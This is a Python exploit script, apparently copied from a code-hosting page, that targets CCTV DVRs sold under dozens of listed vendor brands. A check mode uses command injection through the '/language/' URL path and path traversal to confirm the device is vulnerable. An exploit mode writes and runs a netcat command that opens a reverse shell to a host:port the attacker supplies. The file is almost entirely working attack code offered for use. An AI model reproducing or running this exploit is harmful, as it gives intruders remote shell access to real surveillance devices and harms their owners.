208 lines
No EOL
4.9 KiB
Python
Executable file
208 lines
No EOL
4.9 KiB
Python
Executable file
#!/usr/bin/python
|
|
|
|
# Blog post: http://www.kerneronsec.com/2016/02/remote-code-execution-in-cctv-dvrs-of.html
|
|
|
|
'''
|
|
Vendors List
|
|
|
|
Ademco
|
|
ATS Alarmes technolgy and ststems
|
|
Area1Protection
|
|
Avio
|
|
Black Hawk Security
|
|
Capture
|
|
China security systems
|
|
Cocktail Service
|
|
Cpsecured
|
|
CP PLUS
|
|
Digital Eye'z no website
|
|
Diote Service & Consulting
|
|
DVR Kapta
|
|
ELVOX
|
|
ET Vision
|
|
Extra Eye 4 U
|
|
eyemotion
|
|
EDS
|
|
Fujitron
|
|
Full HD 1080p
|
|
Gazer
|
|
Goldeye
|
|
Goldmaster
|
|
Grizzly
|
|
HD IViewer
|
|
Hi-View
|
|
Ipcom
|
|
IPOX
|
|
IR
|
|
ISC Illinois Security Cameras, Inc.
|
|
JFL Alarmes
|
|
Lince
|
|
LOT
|
|
Lux
|
|
Lynx Security
|
|
Magtec
|
|
Meriva Security
|
|
Multistar
|
|
Navaio
|
|
NoVus
|
|
Optivision
|
|
PARA Vision
|
|
Provision-ISR
|
|
Q-See
|
|
Questek
|
|
Retail Solution Inc
|
|
RIT Huston .com
|
|
ROD Security cameras
|
|
Satvision
|
|
Sav Technology
|
|
Skilleye
|
|
Smarteye
|
|
Superior Electrial Systems
|
|
TechShell
|
|
TechSon
|
|
Technomate
|
|
TecVoz
|
|
TeleEye
|
|
Tomura
|
|
truVue
|
|
TVT
|
|
Umbrella
|
|
United Video Security System, Inc
|
|
Universal IT Solutions
|
|
US IT Express
|
|
U-Spy Store
|
|
Ventetian
|
|
V-Gurad Security
|
|
Vid8
|
|
Vtek
|
|
Vision Line
|
|
Visar
|
|
Vodotech.com
|
|
Vook
|
|
Watchman
|
|
Xrplus
|
|
Yansi
|
|
Zetec
|
|
ZoomX
|
|
'''
|
|
|
|
from sys import argv
|
|
import optparse
|
|
from urlparse import urlparse
|
|
from re import compile
|
|
import socket
|
|
import requests
|
|
from requests.exceptions import ConnectionError, Timeout, ContentDecodingError
|
|
from socket import timeout
|
|
|
|
|
|
|
|
|
|
def main():
|
|
|
|
# parse command line options and atguments
|
|
optparser = optparse.OptionParser(usage="%s <target-url> [options]" % argv[0])
|
|
optparser.add_option('-c','--check',action="store_true",dest="checkvuln", default=False,
|
|
help="Check if target is vulnerable")
|
|
optparser.add_option('-e','--exploit', action="store", type="string", dest="connback",
|
|
help="Fire the exploit against the given target URL")
|
|
|
|
(options, args) = optparser.parse_args()
|
|
|
|
try:
|
|
target = args[0]
|
|
except IndexError:
|
|
optparser.print_help()
|
|
exit()
|
|
|
|
target_url = urlparse(target)
|
|
|
|
# validating hostname
|
|
if not target_url.hostname:
|
|
print "[X] supplied target \"%s\" is not a valid URL" % target
|
|
optparser.print_help()
|
|
exit()
|
|
|
|
# A little hack to handle read timeouts, since urllib2 doesnt give us this functionality.
|
|
socket.setdefaulttimeout(10)
|
|
|
|
# is -c flag on check if target url is vulnrable.
|
|
if options.checkvuln is True:
|
|
print "[!] Checking if target \"%s\" is vulnable..." % target_url.netloc
|
|
try:
|
|
|
|
# Write file
|
|
raw_url_request('%s://%s/language/Swedish${IFS}&&echo${IFS}1>test&&tar${IFS}/string.js'
|
|
% (target_url.scheme, target_url.netloc))
|
|
|
|
# Read the file.
|
|
response = raw_url_request('%s://%s/../../../../../../../mnt/mtd/test' % (target_url.scheme, target_url.netloc))
|
|
|
|
|
|
# remove it..
|
|
raw_url_request('%s://%s//language/Swedish${IFS}&&rm${IFS}test&&tar${IFS}/string.js'
|
|
% (target_url.scheme, target_url.netloc))
|
|
|
|
except (ConnectionError, Timeout, timeout) as e:
|
|
print "[X] Unable to connect. reason: %s. exiting..." % e.message
|
|
return
|
|
if response.text[0] != '1':
|
|
print "[X] Expected response content first char to be '1' got %s. exiting..." % response.text
|
|
return
|
|
|
|
print "[V] Target \"%s\" is vulnerable!" % target_url.netloc
|
|
|
|
|
|
|
|
# if -e is on then fire exploit,
|
|
if options.connback is not None:
|
|
|
|
# Validate connect-back information.
|
|
pattern = compile('(?P<host>[a-zA-Z0-9\.\-]+):(?P<port>[0-9]+)')
|
|
match = pattern.search(options.connback)
|
|
if not match:
|
|
print "[X] given connect back \"%s\" should be in the format for host:port" % options.connback
|
|
optparser.print_help()
|
|
exit()
|
|
|
|
# fire remote code execution!
|
|
|
|
# Three ..
|
|
try:
|
|
raw_url_request('%s://%s/language/Swedish${IFS}&&echo${IFS}nc${IFS}%s${IFS}%s${IFS}>e&&${IFS}/a'
|
|
% (target_url.scheme, target_url.netloc, match.group('host'), match.group('port')))
|
|
|
|
# Two ...
|
|
|
|
raw_url_request('%s://%s/language/Swedish${IFS}&&echo${IFS}"-e${IFS}$SHELL${IFS}">>e&&${IFS}/a'
|
|
% (target_url.scheme, target_url.netloc))
|
|
|
|
|
|
# One. Left off!
|
|
raw_url_request('%s://%s/language/Swedish&&$(cat${IFS}e)${IFS}&>r&&${IFS}/s'
|
|
% (target_url.scheme, target_url.netloc))
|
|
|
|
except (ConnectionError, Timeout, timeout) as e:
|
|
print "[X] Unable to connect reason: %s. exiting..." % e.message
|
|
|
|
|
|
|
|
print "[V] Exploit payload sent!, if nothing went wrong we should be getting a reversed remote shell at %s:%s" \
|
|
% (match.group('host'), match.group('port'))
|
|
|
|
|
|
# Disabling URL encode hack
|
|
def raw_url_request(url):
|
|
r = requests.Request('GET')
|
|
r.url = url
|
|
r = r.prepare()
|
|
# set url without encoding
|
|
r.url = url
|
|
|
|
s = requests.Session()
|
|
return s.send(r)
|
|
|
|
|
|
|
|
if __name__ == '__main__':
|
|
main() |